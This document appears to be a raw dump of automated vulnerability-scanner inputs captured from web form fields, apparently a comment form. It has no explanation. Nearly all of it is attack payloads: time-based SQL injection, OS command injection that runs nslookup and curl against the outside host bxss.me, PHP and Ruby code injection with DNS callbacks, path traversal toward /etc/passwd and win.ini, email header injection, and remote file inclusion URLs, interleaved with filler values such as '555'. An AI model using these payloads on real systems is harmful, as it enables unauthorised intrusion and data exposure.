${@print(md5(31337))}\
555
555
555
/etc/shells
to@example.com>
bcc:0.33437-4586.33437.6045c.19940.2@bxss.me
555
echo piczfl$()\ ehxpfh\nz^xyu||a #' &echo piczfl$()\ ehxpfh\nz^xyu||a #|" &echo piczfl$()\ ehxpfh\nz^xyu||a #
555
'.print(md5(31337)).'
NewsCommentAdd/.
555
555
555
c:/windows/win.ini
555
&echo ffbbep$()\ kmiyrk\nz^xyu||a #' &echo ffbbep$()\ kmiyrk\nz^xyu||a #|" &echo ffbbep$()\ kmiyrk\nz^xyu||a #
555
555
bxss.me
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
file:///etc/passwd
555&echo exksmx$()\ sbisve\nz^xyu||a #' &echo exksmx$()\ sbisve\nz^xyu||a #|" &echo exksmx$()\ sbisve\nz^xyu||a #
555
555
|echo pbqina$()\ lgbopl\nz^xyu||a #' |echo pbqina$()\ lgbopl\nz^xyu||a #|" |echo pbqina$()\ lgbopl\nz^xyu||a #
555|echo kqzcvt$()\ lpavrn\nz^xyu||a #' |echo kqzcvt$()\ lpavrn\nz^xyu||a #|" |echo kqzcvt$()\ lpavrn\nz^xyu||a #
555
../555
555
555
(nslookup -q=cname hitznqnukfvpmb4706.bxss.me||curl hitznqnukfvpmb4706.bxss.me))
555
555
555
555
555
555
$(nslookup -q=cname hithampgkklas8749b.bxss.me||curl hithampgkklas8749b.bxss.me)
555
555
555
555
&nslookup -q=cname hitumtqrhtsjlf091b.bxss.me&'\"`0&nslookup -q=cname hitumtqrhtsjlf091b.bxss.me&`'
555
555
'"()
555
555
&(nslookup -q=cname hitcmhputnkgb60ed7.bxss.me||curl hitcmhputnkgb60ed7.bxss.me)&'\"`0&(nslookup -q=cname hitcmhputnkgb60ed7.bxss.me||curl hitcmhputnkgb60ed7.bxss.me)&`'
555
555
555'&&sleep(27*1000)*vsgxfp&&'
555
|(nslookup -q=cname hitauafzizyxt98945.bxss.me||curl hitauafzizyxt98945.bxss.me)
555"&&sleep(27*1000)*ptwhac&&"
555'||sleep(27*1000)*mkcymp||'
`(nslookup -q=cname hitjotuzkkdwi33a67.bxss.me||curl hitjotuzkkdwi33a67.bxss.me)`
555"||sleep(27*1000)*gjjkzv||"
;(nslookup -q=cname hitidtzjlllgd333a6.bxss.me||curl hitidtzjlllgd333a6.bxss.me)|(nslookup -q=cname hitidtzjlllgd333a6.bxss.me||curl hitidtzjlllgd333a6.bxss.me)&(nslookup -q=cname hitidtzjlllgd333a6.bxss.me||curl hitidtzjlllgd333a6.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
555
555
555
1
555
555
1
555
1
555
1
1
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
555
${10000182+9999475}
555
1
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(82).concat(118).concat(74)+(require"socket"
Socket.gethostbyname("hitla"+"pczlvnyz94681.bxss.me.")[3].to_s)+"
1
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(118).concat(90).concat(113).concat(78)+(require'socket'
Socket.gethostbyname('hitbj'+'oerywqih0e964.bxss.me.')[3].to_s)+'
1
1
555
1
555
1
1%0abcc:0.33437-5969.33437.24c4f.19940.2@bxss.me
1
)
'.gethostbyname(lc('hitik'.'gvjwobdqbb57d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(75).chr(100).chr(87).'
555
1
to@example.com>%0d%0abcc:0.33437-5973.33437.24c4f.19940.2@bxss.me
555
1
!(()&&!|*|*|
".gethostbyname(lc("hitin"."abpnzzbk738d5.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(85).chr(111).chr(69)."
'"
1
555
response.write(9138961*9962321)
^(#$!@#$)(()))******
<!--
1
'+response.write(9138961*9962321)+'
1
1
555
"+response.write(9138961*9962321)+"
1
1
-1 OR 2+617-617-1=0+0+0+1 --
1
1
1
-1 OR 2+722-722-1=0+0+0+1
1
../../../../../../../../../../../../../../etc/passwd
1
1
-1' OR 2+767-767-1=0+0+0+1 --
../../../../../../../../../../../../../../windows/win.ini
1
1
-1' OR 2+100-100-1=0+0+0+1 or 'Mp4TT7Hr'='
555
1
1
file:///etc/passwd
1
1
-1" OR 2+939-939-1=0+0+0+1 --
555
1
1
1
1
1
555
1
1
../1
1
555
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
1
';print(md5(31337));$a='
if(now()=sysdate(),sleep(15),0)
1
555
";print(md5(31337));$a="
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
${@print(md5(31337))}
1
555
Http://bxss.me/t/fit.txt
1
${@print(md5(31337))}\
http://bxss.me/t/fit.txt%3F.jpg
555
'.print(md5(31337)).'
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
/etc/shells
1
555
555
c:/windows/win.ini
1
'"()
1'&&sleep(27*1000)*hyvltg&&'
555
bxss.me
555
1"&&sleep(27*1000)*renjra&&"
1'||sleep(27*1000)*kfozla||'
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
echo xqzkku$()\ kkiqko\nz^xyu||a #' &echo xqzkku$()\ kkiqko\nz^xyu||a #|" &echo xqzkku$()\ kkiqko\nz^xyu||a #
&echo lernfs$()\ idyxml\nz^xyu||a #' &echo lernfs$()\ idyxml\nz^xyu||a #|" &echo lernfs$()\ idyxml\nz^xyu||a #
555
1"||sleep(27*1000)*vmgidn||"
1&echo xlzcjl$()\ mckrfi\nz^xyu||a #' &echo xlzcjl$()\ mckrfi\nz^xyu||a #|" &echo xlzcjl$()\ mckrfi\nz^xyu||a #
555
|echo zpzlne$()\ hnwyvt\nz^xyu||a #' |echo zpzlne$()\ hnwyvt\nz^xyu||a #|" |echo zpzlne$()\ hnwyvt\nz^xyu||a #
555
1|echo jinjeu$()\ wuaege\nz^xyu||a #' |echo jinjeu$()\ wuaege\nz^xyu||a #|" |echo jinjeu$()\ wuaege\nz^xyu||a #
555
(nslookup -q=cname hitizsaeoqujt7e82a.bxss.me||curl hitizsaeoqujt7e82a.bxss.me))
555
1
$(nslookup -q=cname hitfpmoxwzzaw6cc63.bxss.me||curl hitfpmoxwzzaw6cc63.bxss.me)
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
&nslookup -q=cname hitwxvlopmoxr9543e.bxss.me&'\"`0&nslookup -q=cname hitwxvlopmoxr9543e.bxss.me&`'
555
&(nslookup -q=cname hitabwggvuebva4386.bxss.me||curl hitabwggvuebva4386.bxss.me)&'\"`0&(nslookup -q=cname hitabwggvuebva4386.bxss.me||curl hitabwggvuebva4386.bxss.me)&`'
555
|(nslookup -q=cname hitverfanrtyb593ce.bxss.me||curl hitverfanrtyb593ce.bxss.me)
`(nslookup -q=cname hitnuyflkylnrc8cd1.bxss.me||curl hitnuyflkylnrc8cd1.bxss.me)`
-1; waitfor delay '0:0:15' --
;(nslookup -q=cname hithtxojcugff7175b.bxss.me||curl hithtxojcugff7175b.bxss.me)|(nslookup -q=cname hithtxojcugff7175b.bxss.me||curl hithtxojcugff7175b.bxss.me)&(nslookup -q=cname hithtxojcugff7175b.bxss.me||curl hithtxojcugff7175b.bxss.me)
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
Mi3faYbr'; waitfor delay '0:0:15' --
9n3eV6wQ'); waitfor delay '0:0:15' --
BWcGuDoh')); waitfor delay '0:0:15' --
-5 OR 879=(SELECT 879 FROM PG_SLEEP(15))--
-5) OR 676=(SELECT 676 FROM PG_SLEEP(15))--
-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
Nc5ZvAMN' OR 922=(SELECT 922 FROM PG_SLEEP(15))--
GD7tCj8Q') OR 955=(SELECT 955 FROM PG_SLEEP(15))--
xmr5kfi1')) OR 610=(SELECT 610 FROM PG_SLEEP(15))--
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
"+"A".concat(70-3).concat(22*4).concat(108).concat(84).concat(106).concat(78)+(require"socket"
Socket.gethostbyname("hitul"+"bnrffuwx478ca.bxss.me.")[3].to_s)+"
555
${10000192+10000375}
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.gethostbyname(lc('hitjo'.'ibyedrjqab239.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(82).chr(111).chr(89).'
555&n971205=v933455
555
'+'A'.concat(70-3).concat(22*4).concat(107).concat(76).concat(120).concat(71)+(require'socket'
Socket.gethostbyname('hitjk'+'rkgsspbza6acf.bxss.me.')[3].to_s)+'
response.write(9433830*9556976)
555
".gethostbyname(lc("hitok"."ehnywjta5cd6e.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(70).chr(114).chr(86)."
555
'+response.write(9433830*9556976)+'
xfs.bxss.me
555
555
555
"+response.write(9433830*9556976)+"
555
555
555
555
555
555
555
)
'"
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
rqfSrL39
!(()&&!|*|*|
<!--
555
555
';print(md5(31337));$a='
555
^(#$!@#$)(()))******
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
";print(md5(31337));$a="
555
bcc:0.38962-4568.38962.e80d2.19943.2@bxss.me
555
555
555
${@print(md5(31337))}
to@example.com>
bcc:0.38962-4569.38962.e80d2.19943.2@bxss.me
555
555
555
${@print(md5(31337))}\
555
555
NewsCommentAdd
555
'.print(md5(31337)).'
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
echo mycnlb$()\ wptmoc\nz^xyu||a #' &echo mycnlb$()\ wptmoc\nz^xyu||a #|" &echo mycnlb$()\ wptmoc\nz^xyu||a #
555
555
555
555
&echo pgibbv$()\ amwgit\nz^xyu||a #' &echo pgibbv$()\ amwgit\nz^xyu||a #|" &echo pgibbv$()\ amwgit\nz^xyu||a #
NewsCommentAdd/.
555
555
555
Http://bxss.me/t/fit.txt
555
555&echo nzwnvl$()\ czanuf\nz^xyu||a #' &echo nzwnvl$()\ czanuf\nz^xyu||a #|" &echo nzwnvl$()\ czanuf\nz^xyu||a #
1
555
555
555
http://bxss.me/t/fit.txt?.jpg
|echo rylemv$()\ reteoq\nz^xyu||a #' |echo rylemv$()\ reteoq\nz^xyu||a #|" |echo rylemv$()\ reteoq\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
555
555|echo ydnkkb$()\ rmxkps\nz^xyu||a #' |echo ydnkkb$()\ rmxkps\nz^xyu||a #|" |echo ydnkkb$()\ rmxkps\nz^xyu||a #
555
555
/etc/shells
../../../../../../../../../../../../../../windows/win.ini
555
c:/windows/win.ini
(nslookup -q=cname hitjnwqlyopxsa010a.bxss.me||curl hitjnwqlyopxsa010a.bxss.me))
555
555
file:///etc/passwd
1
'"()
bxss.me
555
$(nslookup -q=cname hitkrhuofuyjqfb0ab.bxss.me||curl hitkrhuofuyjqfb0ab.bxss.me)
555
555'&&sleep(27*1000)*keqlqs&&'
555
../555
&nslookup -q=cname hitcauejtnzte474b9.bxss.me&'\"`0&nslookup -q=cname hitcauejtnzte474b9.bxss.me&`'
555"&&sleep(27*1000)*alrhct&&"
555
&(nslookup -q=cname hitniqvkytfszab6c7.bxss.me||curl hitniqvkytfszab6c7.bxss.me)&'\"`0&(nslookup -q=cname hitniqvkytfszab6c7.bxss.me||curl hitniqvkytfszab6c7.bxss.me)&`'
555
555'||sleep(27*1000)*whbimf||'
555
|(nslookup -q=cname hitpjqrpeazcbe5135.bxss.me||curl hitpjqrpeazcbe5135.bxss.me)
555
555"||sleep(27*1000)*itvnqx||"
555
`(nslookup -q=cname hitqxfpmwfkts221df.bxss.me||curl hitqxfpmwfkts221df.bxss.me)`
555
;(nslookup -q=cname hitjbavlxlynk7c994.bxss.me||curl hitjbavlxlynk7c994.bxss.me)|(nslookup -q=cname hitjbavlxlynk7c994.bxss.me||curl hitjbavlxlynk7c994.bxss.me)&(nslookup -q=cname hitjbavlxlynk7c994.bxss.me||curl hitjbavlxlynk7c994.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+831-831-1=0+0+0+1 --
555
555
-1 OR 2+755-755-1=0+0+0+1
555
555
555
-1' OR 2+959-959-1=0+0+0+1 --
555
-1' OR 2+589-589-1=0+0+0+1 or 'qnfgRjTb'='
555
-1" OR 2+503-503-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
1
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
555
${9999312+9999042}
1
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
'.gethostbyname(lc('hithp'.'renvqnkjbcfee.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(67).chr(116).chr(90).'
"+"A".concat(70-3).concat(22*4).concat(101).concat(71).concat(117).concat(76)+(require"socket"
Socket.gethostbyname("hitxb"+"taqtqdsr50d15.bxss.me.")[3].to_s)+"
1
555
1
1
".gethostbyname(lc("hitxh"."nnclzdhraa06d.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(83).chr(104).chr(69)."
'+'A'.concat(70-3).concat(22*4).concat(107).concat(83).concat(110).concat(72)+(require'socket'
Socket.gethostbyname('hitcj'+'loqykmzn48f4a.bxss.me.')[3].to_s)+'
1
1
1
555
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1<esi:include src="http://bxss.me/rpb.png"/>
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
'"
555
1
1
<!--
555
1
)
1
555
1
1
!(()&&!|*|*|
1
-1; waitfor delay '0:0:15' --
1
1%0abcc:0.38962-6548.38962.d8029.19943.2@bxss.me
555
1
1
^(#$!@#$)(()))******
to@example.com>%0d%0abcc:0.38962-6552.38962.d8029.19943.2@bxss.me
1
555
1
1
1
555
1
555
1
1
1
1
-1); waitfor delay '0:0:15' --
1
555
1
1
1
response.write(9488245*9326301)
1
555
1
1
1
../../../../../../../../../../../../../../etc/passwd
'+response.write(9488245*9326301)+'
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
-1)); waitfor delay '0:0:15' --
../../../../../../../../../../../../../../windows/win.ini
"+response.write(9488245*9326301)+"
1
555
';print(md5(31337));$a='
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
file:///etc/passwd
1
555
";print(md5(31337));$a="
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
1 waitfor delay '0:0:15' --
555
1
${@print(md5(31337))}
Http://bxss.me/t/fit.txt
../1
1
555
${@print(md5(31337))}\
http://bxss.me/t/fit.txt%3F.jpg
1
555
'.print(md5(31337)).'
/etc/shells
555
1
c:/windows/win.ini
1
555
1
bxss.me
1
N5Bz1mZk'; waitfor delay '0:0:15' --
1
555
1
1
echo cdlilq$()\ grsrma\nz^xyu||a #' &echo cdlilq$()\ grsrma\nz^xyu||a #|" &echo cdlilq$()\ grsrma\nz^xyu||a #
&echo btgnzb$()\ jngrbr\nz^xyu||a #' &echo btgnzb$()\ jngrbr\nz^xyu||a #|" &echo btgnzb$()\ jngrbr\nz^xyu||a #
1&echo xkskaf$()\ kkdaad\nz^xyu||a #' &echo xkskaf$()\ kkdaad\nz^xyu||a #|" &echo xkskaf$()\ kkdaad\nz^xyu||a #
WXmltyLz'); waitfor delay '0:0:15' --
1
|echo zmgdgx$()\ kzlfhn\nz^xyu||a #' |echo zmgdgx$()\ kzlfhn\nz^xyu||a #|" |echo zmgdgx$()\ kzlfhn\nz^xyu||a #
1|echo shiqrj$()\ nhwdcj\nz^xyu||a #' |echo shiqrj$()\ nhwdcj\nz^xyu||a #|" |echo shiqrj$()\ nhwdcj\nz^xyu||a #
(nslookup -q=cname hitqzogsxynqe5fe45.bxss.me||curl hitqzogsxynqe5fe45.bxss.me))
'"()
$(nslookup -q=cname hitfivzdmayku6e55a.bxss.me||curl hitfivzdmayku6e55a.bxss.me)
1'&&sleep(27*1000)*dbpeqq&&'
&nslookup -q=cname hitdmcnkuqsjwcd69b.bxss.me&'\"`0&nslookup -q=cname hitdmcnkuqsjwcd69b.bxss.me&`'
VFeRyo4T')); waitfor delay '0:0:15' --
1"&&sleep(27*1000)*icywcu&&"
&(nslookup -q=cname hitxdibmeuhdre0219.bxss.me||curl hitxdibmeuhdre0219.bxss.me)&'\"`0&(nslookup -q=cname hitxdibmeuhdre0219.bxss.me||curl hitxdibmeuhdre0219.bxss.me)&`'
1'||sleep(27*1000)*kiavkr||'
|(nslookup -q=cname hitnzdbnfuenu0f336.bxss.me||curl hitnzdbnfuenu0f336.bxss.me)
`(nslookup -q=cname hitbkqrryksnw28cf1.bxss.me||curl hitbkqrryksnw28cf1.bxss.me)`
1"||sleep(27*1000)*kgjgvo||"
;(nslookup -q=cname hittqrjztpmtt9ccf8.bxss.me||curl hittqrjztpmtt9ccf8.bxss.me)|(nslookup -q=cname hittqrjztpmtt9ccf8.bxss.me||curl hittqrjztpmtt9ccf8.bxss.me)&(nslookup -q=cname hittqrjztpmtt9ccf8.bxss.me||curl hittqrjztpmtt9ccf8.bxss.me)
-5 OR 127=(SELECT 127 FROM PG_SLEEP(15))--
1
-5) OR 288=(SELECT 288 FROM PG_SLEEP(15))--
-1)) OR 795=(SELECT 795 FROM PG_SLEEP(15))--
jqh2LaZh' OR 727=(SELECT 727 FROM PG_SLEEP(15))--
wtaPOtjr') OR 900=(SELECT 900 FROM PG_SLEEP(15))--
OKLTnxFB')) OR 801=(SELECT 801 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@X3FUu
555
555
555
555
555
555
555
555
555
555
555
555
1
555
1
1
1
1
1
1
555
1
555
1
555
1
555
1
555
1
555
555
555
1
555
1
555
1
1
1
1
1
1
1
1
1
1
-1 OR 2+741-741-1=0+0+0+1 --
-1 OR 2+680-680-1=0+0+0+1
-1' OR 2+892-892-1=0+0+0+1 --
-1' OR 2+133-133-1=0+0+0+1 or 'TyRSAoy1'='
-1" OR 2+744-744-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
555
555
555
555
555
555
1 waitfor delay '0:0:15' --
555
9X3IbKwK'; waitfor delay '0:0:15' --
555
fIQoLEQu'); waitfor delay '0:0:15' --
555
9hKBpiw2')); waitfor delay '0:0:15' --
555
-5 OR 789=(SELECT 789 FROM PG_SLEEP(15))--
555
-5) OR 678=(SELECT 678 FROM PG_SLEEP(15))--
555
-1)) OR 465=(SELECT 465 FROM PG_SLEEP(15))--
555
0uBNfNdq' OR 695=(SELECT 695 FROM PG_SLEEP(15))--
555
v3Dji6i7') OR 990=(SELECT 990 FROM PG_SLEEP(15))--
555
GvapTI6j')) OR 654=(SELECT 654 FROM PG_SLEEP(15))--
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1�����%2527%2522
@@vhPcS
555
555
555
1
1
555
1
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
"+"A".concat(70-3).concat(22*4).concat(97).concat(77).concat(101).concat(81)+(require"socket"
Socket.gethostbyname("hitcv"+"itesvkcr153c8.bxss.me.")[3].to_s)+"
555
555
'.gethostbyname(lc('hitcr'.'uwdwttpv24812.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(66).chr(117).chr(87).'
'+'A'.concat(70-3).concat(22*4).concat(118).concat(74).concat(107).concat(78)+(require'socket'
Socket.gethostbyname('hitlg'+'bpwlpwzxcc8ff.bxss.me.')[3].to_s)+'
response.write(9117688*9322189)
555&n960018=v982423
555
555
'+response.write(9117688*9322189)+'
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)
xfs.bxss.me
555
${10000447+10000165}
"+response.write(9117688*9322189)+"
555
!(()&&!|*|*|
555
1
555
555
".gethostbyname(lc("hittt"."zvededtbbeb59.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(89).chr(103).chr(83)."
^(#$!@#$)(()))******
555
'"
555
555
555
555
<!--
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
G8thwVkU
555
';print(md5(31337));$a='
1
555
555
NewsCommentAdd
";print(md5(31337));$a="
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
echo ltklqq$()\ mtaewr\nz^xyu||a #' &echo ltklqq$()\ mtaewr\nz^xyu||a #|" &echo ltklqq$()\ mtaewr\nz^xyu||a #
555
Http://bxss.me/t/fit.txt
555
555
&echo szqehv$()\ tmmvea\nz^xyu||a #' &echo szqehv$()\ tmmvea\nz^xyu||a #|" &echo szqehv$()\ tmmvea\nz^xyu||a #
555
555
555
bcc:0.33801-4582.33801.99b4a.19946.2@bxss.me
http://bxss.me/t/fit.txt?.jpg
555
555&echo gtfryj$()\ ceeuqs\nz^xyu||a #' &echo gtfryj$()\ ceeuqs\nz^xyu||a #|" &echo gtfryj$()\ ceeuqs\nz^xyu||a #
${@print(md5(31337))}
NewsCommentAdd/.
555
to@example.com>
bcc:0.33801-4586.33801.99b4a.19946.2@bxss.me
555
555
555
|echo tfpnxu$()\ shtfos\nz^xyu||a #' |echo tfpnxu$()\ shtfos\nz^xyu||a #|" |echo tfpnxu$()\ shtfos\nz^xyu||a #
/etc/shells
${@print(md5(31337))}\
555
555
555
555
c:/windows/win.ini
'.print(md5(31337)).'
555|echo uvpxxs$()\ anvdus\nz^xyu||a #' |echo uvpxxs$()\ anvdus\nz^xyu||a #|" |echo uvpxxs$()\ anvdus\nz^xyu||a #
555
555
555
../../../../../../../../../../../../../../etc/passwd
(nslookup -q=cname hitksmdezuqst8fd78.bxss.me||curl hitksmdezuqst8fd78.bxss.me))
bxss.me
555
555
../../../../../../../../../../../../../../windows/win.ini
$(nslookup -q=cname hittmsnvzuhata558a.bxss.me||curl hittmsnvzuhata558a.bxss.me)
555
555
'"()
file:///etc/passwd
&nslookup -q=cname hitoutryeurpqa303f.bxss.me&'\"`0&nslookup -q=cname hitoutryeurpqa303f.bxss.me&`'
555
555'&&sleep(27*1000)*qndavw&&'
555
555
&(nslookup -q=cname hitvmofqvqflf56804.bxss.me||curl hitvmofqvqflf56804.bxss.me)&'\"`0&(nslookup -q=cname hitvmofqvqflf56804.bxss.me||curl hitvmofqvqflf56804.bxss.me)&`'
555
555"&&sleep(27*1000)*nvgply&&"
../555
555
|(nslookup -q=cname hitdtxexwqgxh05ad8.bxss.me||curl hitdtxexwqgxh05ad8.bxss.me)
555
555'||sleep(27*1000)*cmdqex||'
555
555
`(nslookup -q=cname hitxeqtunbkpqa6879.bxss.me||curl hitxeqtunbkpqa6879.bxss.me)`
555
555"||sleep(27*1000)*znjsfn||"
555
555
;(nslookup -q=cname hitusyhzfgcusc0285.bxss.me||curl hitusyhzfgcusc0285.bxss.me)|(nslookup -q=cname hitusyhzfgcusc0285.bxss.me||curl hitusyhzfgcusc0285.bxss.me)&(nslookup -q=cname hitusyhzfgcusc0285.bxss.me||curl hitusyhzfgcusc0285.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+28-28-1=0+0+0+1 --
-1 OR 2+888-888-1=0+0+0+1
555
-1' OR 2+478-478-1=0+0+0+1 --
555
555
-1' OR 2+56-56-1=0+0+0+1 or 'S7EvXg6x'='
555
555
555
555
-1" OR 2+268-268-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
-1; waitfor delay '0:0:15' --
555
-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
-1)); waitfor delay '0:0:15' --
555
555
1
1 waitfor delay '0:0:15' --
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
1
1
1
1
"+"A".concat(70-3).concat(22*4).concat(109).concat(81).concat(107).concat(77)+(require"socket"
Socket.gethostbyname("hitdq"+"sjzjjacua095b.bxss.me.")[3].to_s)+"
1
KL3Oq2d2'; waitfor delay '0:0:15' --
'.gethostbyname(lc('hitde'.'vppbcsofbed54.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(80).chr(100).chr(86).'
'+'A'.concat(70-3).concat(22*4).concat(102).concat(86).concat(111).concat(76)+(require'socket'
Socket.gethostbyname('hitgt'+'hqzjzhmfeb1fd.bxss.me.')[3].to_s)+'
1
".gethostbyname(lc("hitre"."cabnhmayef4c1.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(77).chr(116).chr(77)."
1
1
response.write(9926065*9811361)
1
'+response.write(9926065*9811361)+'
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
"+response.write(9926065*9811361)+"
1
1
1
1
1
${9999504+10000438}
1
rlhWIRWL'); waitfor delay '0:0:15' --
1
1
1
1
1%0abcc:0.33801-6948.33801.2858a.19946.2@bxss.me
1
1
1
1
to@example.com>%0d%0abcc:0.33801-6949.33801.2858a.19946.2@bxss.me
1
)
'"
!(()&&!|*|*|
1
1
1
1
^(#$!@#$)(()))******
1
1<esi:include src="http://bxss.me/rpb.png"/>
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1
1
<!--
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
Http://bxss.me/t/fit.txt
0R4OyHRe')); waitfor delay '0:0:15' --
1
1
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
1
1
/etc/shells
1
1
1
c:/windows/win.ini
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
bxss.me
';print(md5(31337));$a='
-5 OR 949=(SELECT 949 FROM PG_SLEEP(15))--
1
";print(md5(31337));$a="
1
1
${@print(md5(31337))}
../../../../../../../../../../../../../../etc/passwd
1
${@print(md5(31337))}\
'.print(md5(31337)).'
-5) OR 542=(SELECT 542 FROM PG_SLEEP(15))--
../../../../../../../../../../../../../../windows/win.ini
1
file:///etc/passwd
1
echo tdvmxl$()\ iscvrk\nz^xyu||a #' &echo tdvmxl$()\ iscvrk\nz^xyu||a #|" &echo tdvmxl$()\ iscvrk\nz^xyu||a #
../1
&echo smduba$()\ rhvtxy\nz^xyu||a #' &echo smduba$()\ rhvtxy\nz^xyu||a #|" &echo smduba$()\ rhvtxy\nz^xyu||a #
1
1&echo mdlhsx$()\ znfghf\nz^xyu||a #' &echo mdlhsx$()\ znfghf\nz^xyu||a #|" &echo mdlhsx$()\ znfghf\nz^xyu||a #
|echo jlfsvi$()\ emzkbu\nz^xyu||a #' |echo jlfsvi$()\ emzkbu\nz^xyu||a #|" |echo jlfsvi$()\ emzkbu\nz^xyu||a #
1|echo hpkxsj$()\ qafado\nz^xyu||a #' |echo hpkxsj$()\ qafado\nz^xyu||a #|" |echo hpkxsj$()\ qafado\nz^xyu||a #
'"()
-1)) OR 818=(SELECT 818 FROM PG_SLEEP(15))--
1'&&sleep(27*1000)*fvkpaz&&'
1"&&sleep(27*1000)*ypluvt&&"
1
(nslookup -q=cname hitboqpitaqhca7c7c.bxss.me||curl hitboqpitaqhca7c7c.bxss.me))
1'||sleep(27*1000)*rluxki||'
$(nslookup -q=cname hitvsgkgqghcq3ce3e.bxss.me||curl hitvsgkgqghcq3ce3e.bxss.me)
1"||sleep(27*1000)*eusnem||"
&nslookup -q=cname hitcckjmlleuea97ef.bxss.me&'\"`0&nslookup -q=cname hitcckjmlleuea97ef.bxss.me&`'
&(nslookup -q=cname hitluepwwrtgc17144.bxss.me||curl hitluepwwrtgc17144.bxss.me)&'\"`0&(nslookup -q=cname hitluepwwrtgc17144.bxss.me||curl hitluepwwrtgc17144.bxss.me)&`'
S8rON0Ku' OR 791=(SELECT 791 FROM PG_SLEEP(15))--
|(nslookup -q=cname hitogfwvoolez6bc89.bxss.me||curl hitogfwvoolez6bc89.bxss.me)
`(nslookup -q=cname hitcldvompytx3487f.bxss.me||curl hitcldvompytx3487f.bxss.me)`
